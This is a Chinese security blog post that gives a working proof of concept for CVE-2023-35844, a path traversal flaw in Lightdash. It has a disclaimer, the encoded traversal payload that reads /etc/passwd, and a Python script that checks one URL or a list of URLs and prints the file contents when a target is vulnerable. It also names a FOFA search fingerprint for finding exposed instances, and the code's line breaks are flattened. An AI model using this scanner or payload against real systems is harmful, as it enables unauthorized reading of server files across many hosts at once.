Lightdash | CVE-2023-35844（附POC）

免责声明  由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，WK安全及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

url+ "/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd"

import requestsimport sys
print('+------------------------------------------')print('+ \033[36m使用格式: python3 CVE-2023-35844.py -u https://x.x.x.x \033[0m')print('+ \033[36m使用格式: python3 CVE-2023-35844.py -f xxx.txt \033[0m')print('+ \033[36m指纹特征: fofa: "Lightdash" \033[0m')print('+ \033[36mauther >>> Lsec \033[0m')print('+------------------------------------------')
payload = "/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd"
#只扫描urldef url_poc(url):    domain = url + payload    requests.packages.urllib3.disable_warnings()    resp = requests.get(domain,verify=False)    if "root" in resp.text:        print(url+"存在漏洞")        print(resp.text)
def list_url_poc(urls):    with open(urls, "r") as f:        for url in f.readlines():            domain = (url.strip() + payload)            requests.packages.urllib3.disable_warnings()            resp = requests.get(domain, verify=False)            if "root" in resp.text:                print(url + "存在漏洞")                print(resp.text)
if __name__ == '__main__':    if len(sys.argv) != 3:        print("Usage: python CVE-2023-35844.py -u <url>")        print("Usage: python CVE-2023-35844.py -f <url>")        sys.exit(1)
    if sys.argv[1] == "-u":        url = sys.argv[2]        url_poc(url)    elif sys.argv[1] == "-f":        urls = sys.argv[2]        list_url_poc(urls)

https://github.com/Szlein/CVE-2023-35844/blob/main/CVE-2023-35844.py